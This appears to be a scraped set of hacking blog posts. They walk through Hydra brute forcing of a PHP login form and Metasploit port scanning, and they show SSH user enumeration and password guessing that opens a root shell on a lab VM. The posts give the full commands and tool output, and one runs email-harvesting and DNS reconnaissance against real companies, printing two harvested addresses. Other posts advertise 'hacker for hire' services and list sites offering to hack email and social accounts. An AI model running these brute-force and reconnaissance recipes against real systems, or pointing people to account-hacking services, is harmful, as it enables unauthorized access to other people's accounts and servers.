Web Form brute forcing

I have coded a simple html login form for this test. Hydra can brute force web form faster and effectively than other tools. But it requires you to understand that how the form is being handled. So the hacker need to have basic understanding of html too. Also the hacker/you need to find out the correct username otherwise it will be failed or will need to brute force the  user name which is really bad idea.

The login form:

<html>
<head>
<title>Admin Login</title>
</head>

<body>
<center>
<h1>Administrator Login</h1>
<formaction="log.php"method="post">
Username:<inputtype="text"name="user"placeholder="admin"><br>
Password:<inputtype="password"name="password"placeholder="password"><br>
<inputtype="submit"name="user"value="submit">
</form>
</center>

</body>
</html>

We actually need to brute force the name="password" . "password" is the name of the password field which need to match with an string from database or from php hard coded string. For your better understanding i am pasting the log.php too:

<?php

$pass="yourpass";

$passGet=$_POST["password"];

if($passGet==$pass){
echo"success!";
echo"<br>";
}

else{
echo"fail";
}


?>

In the php code $passGet=$_POST["password"]; getting field string by post method and comparing with variable $pass . If you input yourpass in password field then it will say success otherwise fail.

Imagine, We don't know the password so we are going to brute force it using hydra. We have following information:

URL: http://http://localhost/login/ (Optional?)
Action page: http://localhost/login/log.php   (Required)
User: admin
Form parameter:  user=admin&password=brute-force-here   (see the html!)

Let us now brute force the password using thc-hydra.

Hydra command 1:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

Here is output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:08:07
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 1]
[80][www-form] host: 192.168.206.1   login: admin   password: yourpass
1 of 1 target successfully completed, 1 valid password found

Let's break down the "/login/log.php:user=^USER^&password=^PASS^:S=success" 

/login/ = path

log.php = Action page 

user = First parameter

^USER^ = Use the strings from -l or -L

password = Second parameter

^PASS^ =  Use the strings from -p or -P(usually dictionary file or for brute force option -x)

S=success = When hydra see success message from the action page it will stop mean , Successfully cracked!

This is really important. If it has been set wrong then hydra will give false positive. So careful! 

Hydra command 2:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

Output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:38:28
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 2]
[80][www-form] host: 192.168.206.1   login: admin   password: yourpass
1 of 1 target successfully completed, 1 valid password found

In this command brute forced the page with fail string. When input bad password , the page generate "fail" message. So we tell the thc-hydra that keep attacking whenever you see the message "fail" . So hydra won't stop until it see other strings instead "fail".  But we need to be careful that if in the success page has "fail" string in somewhere then hydra will give you false results.  Depend on the situation ! For example a success page might have following welcome message:

Welcome User! We are not responsible if you are fail to protect your confidential information. Be careful from hacker!

In this case hydra will give false result. So think , how you want to set fail string!



Some tips against brute force:
1. Use strong password.
2. Login page should have captcha.
3. Server should be counting the fail attempt and block the ip after few fail attempt of login.



Hope you enjoyed!

Compiling c++ multiple sources file

January 25, 2014, 1:06 am

≫ Next: How to use IBM AppScan Software to scan website - Found tutorial on centralhacker.com

≪ Previous: Brute force attack & dictionary password cracking using hydra

$

0

0

c++ multiple sources file compiling using g++ is easy but it requires a little manual works. Multiple source file compiling can be more easy and straight using make file. But i will give here only a simple example. If you think you need  example of makefile too then you can Google search or write comments and i will update this post!

Hope you already understand the basic of c++ like functions,class etc.

C++ source file one

#include <iostream>
#include "hell.h"

voidtesting(){
 std::cout<<"Test\n";
 testing1();
}

intmain(){
 std::cout<<"Test\n";
 testing();

return0;
}

C++ source file two

#include "hell.h"

voidtesting1(){
 Test tt;
 tt.t="LALA";
 std::cout<<"Hello world 2\n"<<tt.t<<std::endl;

        tt.h();

 }

void test::h(){
 std::cout<<"C++ method\n";
} 

I declared object name of the class called "Test".
t is variable declared in the header file so tt.t mean "use the variable from class Test!".
You can write any valid code in the function or in c++ Class method!

C++ Header file

#ifndef HELL_H //if hell.h not defined the go to next preprocessor
#define HELL_H // Well, Include the header!

#include <iostream>

voidtesting1();
voidtesting();

classTest{
public:
 std::string t;
voidh();
};

#endif //Protection done!

It is just simple compiling the sources using g++ :

g++ main.cpp main2.cpp -o main

pro@pusheax:~/coding/c++/basic/multi$ ./main
Test
Test
Hello world 2
LALA
C++ method

Thanks for reading!

How to use IBM AppScan Software to scan website - Found tutorial on centralhacker.com

November 22, 2014, 2:09 am

≫ Next: Hacker For Hire

≪ Previous: Compiling c++ multiple sources file

$

0

0

AppScan is a web vulnerability scanner. I used it before but did not make a tutorial on this. But i got a very basic tutorial on centralhacker.com and wanted to share with you guys!

Read: http://centralhacker.com/hacking-software-learn-to-hack.html

Hacker For Hire

December 9, 2014, 7:01 am

≫ Next: Metasploit Port Scanning

≪ Previous: How to use IBM AppScan Software to scan website - Found tutorial on centralhacker.com

$

0

0

Hacker for hire? What do you mean by that?

PushEax now offer Ethical Hacker for hire services widely.



What PushEax can do for you?

Website hacking & Security Analysis, Accounts Security checking, Virus Removal, Computer Forensic and many more.



Does it cost money if hire hacker? 

PushEax will work hard for you. So it costs money!



How many services you provide?

There are many hacker for hire services pusheax offer. If something is missing just contact.


PushEax Deal with Server hacking, Password hacking, Email hacking and more security ananlyzing services. Now PushEax provide most kind of white hat hacking services widely ....... More Details!

Metasploit Port Scanning

December 14, 2014, 9:32 am

≫ Next: Metasploit Information Gathering Basic[Search for info]

≪ Previous: Hacker For Hire

$

0

0

Port Scan is Often done by hackers and penetration tester to identifying and discovering internal services of target host. Port Scanning is an important action for gathering more information of the target host. Today, We will see how to use Metasploit to scan port. Metasploit is a free and open source popular  Exploitation Framework. This Framework widely used by hackers and professional penetration tester. Let's see how we can use Metasploit for basic port scanning.

If you have Kali Linux then Metasploit already installed ! Or download from Rapid7 and install it.


Our Target: http://192.168.67.136/ 


Our First Module is auxiliary/scanner/portscan/syn


Now let's start scanning!

msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds
Now let's start scanning!

Simply we need to set RHOSTS which is 192.168.67.136 and Port Range 1-65535(Do you really want to scan all port? )

msf auxiliary(syn) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(syn) > set PORTS 80,3306,22,1337
PORTS => 80,3306,22,1337
msf auxiliary(syn) >

Now set interesting ports and execute "run" Command:

 msf auxiliary(syn) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(syn) > run

[*]  TCP OPEN 192.168.67.136:22
[*]  TCP OPEN 192.168.67.136:80
[*]  TCP OPEN 192.168.67.136:139
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >

Now let's how auxiliary/scanner/portscan/tcp works:

msf auxiliary(tcp) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(tcp) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(tcp) > run

[*] 192.168.67.136:139 - TCP OPEN
[*] 192.168.67.136:22 - TCP OPEN
[*] 192.168.67.136:80 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >


Really Easy but nmap is best!

More Metasploit Tutorials Coming soon! :)

Metasploit Information Gathering Basic[Search for info]

December 17, 2014, 1:01 am

≫ Next: Hacking SSH with Metasploit Auxiliary Modules

≪ Previous: Metasploit Port Scanning

$

0

0

Metasploit is an open source penetration testing framework. Using some metasploit auxiliary  modules we can gather information against our target. Let's see how to do it in simple step to collect emails.

 msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > show options

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DOMAIN                          yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

msf auxiliary(search_email_collector) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from microsoft.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from microsoft.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from microsoft.com
[*] Extracting emails from Yahoo search results...
[*] Located 0 email addresses for microsoft.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) > set DOMAIN cisco.com
DOMAIN => cisco.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from cisco.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from cisco.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from cisco.com
[*] Extracting emails from Yahoo search results...
[*] Located 2 email addresses for cisco.com
[*]     gsahagun@cisco.com
[*]     vern@cisco.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) >

Microsoft is little scary to post their email address publicly ?

Let's find some DNS information with Metasploit against microsoft:

msf auxiliary(shodan_search) > use auxiliary/gather/dns_info
msf auxiliary(dns_info) > show options

Module options (auxiliary/gather/dns_info):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   DOMAIN                   yes       The target domain name
   NS                       no        Specify the name server to use for queries, otherwise use the system configured DNS Server is used.

msf auxiliary(dns_info) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_info) > run

[*] Enumerating microsoft.com
[+] microsoft.com - Address 134.170.188.221 found. Record type: A
[+] microsoft.com - Address 134.170.185.46 found. Record type: A
[+] microsoft.com - Name server ns4.msft.net (208.76.45.53) found. Record type: NS
[+] microsoft.com - Name server ns4.msft.net (2620:0:37::53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (208.84.0.53) found. Record type: NS
[+] microsoft.com - Name server ns1.msft.net (2620:0:30::53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (208.84.2.53) found. Record type: NS
[+] microsoft.com - Name server ns2.msft.net (2620:0:32::53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (193.221.113.53) found. Record type: NS
[+] microsoft.com - Name server ns3.msft.net (2620:0:34::53) found. Record type: NS
[+] microsoft.com - ns1.msft.net (208.84.0.53) found. Record type: SOA
[+] microsoft.com - ns1.msft.net (2620:0:30::53) found. Record type: SOA
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.170) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.138) found. Record type: MX
[+] microsoft.com - Mail server microsoft-com.mail.protection.outlook.com (207.46.163.215) found. Record type: MX
[+] microsoft.com - Text info found: v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all . Record type: TXT
[+] microsoft.com - Text info found: FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ== . Record type: TXT
[*] Auxiliary module execution completed
msf auxiliary(dns_info) > 


to find SRV record do the following:

msf auxiliary(dns_info) > use auxiliary/gather/dns_srv_enum
msf auxiliary(dns_srv_enum) > show options

Module options (auxiliary/gather/dns_srv_enum):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   ALL_NS  false            no        Run against all name servers for the given domain.
   DOMAIN                   yes       The target domain name.

msf auxiliary(dns_srv_enum) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_srv_enum) > run

[*] Enumerating SRV Records for microsoft.com
[+] Host: sipfed.microsoft.com IP: 131.107.255.86 Service: sipfederationtls Protocol: tcp Port: 5061
[+] Host: sipdog3.microsoft.com IP: 131.107.1.47 Service: xmpp-server Protocol: tcp Port: 5269
[*] Auxiliary module execution completed

Bit lazy to format the text to code. So this might be little hard to read. But I think you still now have basic idea that how you can use metasploit for information gathering. If you like to see more in details or any questions .... you can post comments here.


  

---

Hacking SSH with Metasploit Auxiliary Modules

December 17, 2014, 1:30 am

≫ Next: Integer and String Based SQL Injection Tutorial

≪ Previous: Metasploit Information Gathering Basic[Search for info]

$

0

0

Perhaps SSH is another popular services targeted by hackers. So in this post going to show you how to use metasploit modules to dictionary or brute force attack to hack SSH server.

Firstly we need to find the correct users to make the password guessing attack. We can enumerate username with metasploit auxiliary/scanner/ssh/ssh_enumusers module:

msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      22               yes       The target port
   THREADS    1                yes       The number of concurrent threads
   THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
   USER_FILE                   yes       File containing usernames, one per line

msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run

[*] 192.168.67.136:22 - SSH - Checking for false positives
[*] 192.168.67.136:22 - SSH - Starting scan
[+] 192.168.67.136:22 - SSH - User 'root' found
[!] 192.168.67.136:22 - SSH - User 'owaspbroken' not found
[!] 192.168.67.136:22 - SSH - User 'broken' not found
[!] 192.168.67.136:22 - SSH - User 'mag' not found
[!] 192.168.67.136:22 - SSH - User 'admin' not found
[!] 192.168.67.136:22 - SSH - User 'Administrator' not found
[!] 192.168.67.136:22 - SSH - User 'owaspbwa' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >

The username 'root' is found . Let's do something else.... thinking... thinking!

Let's find out the version of the SSH for future reference to find exploits:

msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run

[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



Well, Now lets guess the password. Always try to have good list of password otherwise it will waste of time. SSH is slow to guess password. Anyway, Here is how we can hack the ssh server:

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa''uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'Administrator:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbwa:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa''uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:root'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:root'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'broken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'broken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:root'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:broken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:mag'
[-] 192.168.67.136:22 SSH - Failed: 'mag:admin'
[-] 192.168.67.136:22 SSH - Failed: 'mag:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:root'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:broken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:mag'
[-] 192.168.67.136:22 SSH - Failed: 'admin:admin'
[-] 192.168.67.136:22 SSH - Failed: 'admin:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

Let me know if you have questions!

Integer and String Based SQL Injection Tutorial

December 31, 2014, 10:48 am

≫ Next: Want to hire hackers? Some Hackers for Hire Website List

≪ Previous: Hacking SSH with Metasploit Auxiliary Modules

$

0

0

After Getting tutorial about IBM AppScan from Central Hacker who are also claim themselves as Hacker for hire i found two more tutorial on SQL Injection.

They used SQLI-LAB though but it is good to follow. As Hacker for hire they should post example & tutorial against real site?

Anyway, You guys can read these tutorial from their blog:

Integer Single Quote SQL Injection  

String Based SQL Injection





Note:pusheax does not have any kind of relation with these kind of company. It is just about sharing document!

Want to hire hackers? Some Hackers for Hire Website List

October 8, 2015, 11:36 pm

≪ Previous: Integer and String Based SQL Injection Tutorial

$

0

0

I have seen some hackers for hire company advertising their hacking services. They promise to hack Email password, Social Account password, database, even SmartPhone.

Some of them fake hackers for hire company(Their customer complaints) and some for real company to hire a professional hacker.

I will list some company here but it is your responsibility to verify them before working with them. Because i am not reviewing their services. It is just few hacking services websites list. So be careful !

Hackers for Hire site list

1. centralhacker.com (Central hacker seems legit though)
2. hirehackeronline.com (SEO purpose or real?)
3. hacker1337.com ( Hacker 1337 open for long time)
4. goldenhacker.com (Golden Hacker , Mean gold hacker?)
5. hackeris.com
6. neighborhoodhacker.com (Long time in business? The do the job?)
7. hirethehacker.com (SEO Purpose or real)
8. cryptohackers.com
9. hireanhacker.com
10. hirenhack.com (Seems new in business!)

Again i am not doing any review of their hacking services.  These list for them who are looking to hire a hacker.

Warning: Be careful , most of them might be just a scam and some may be for real!!!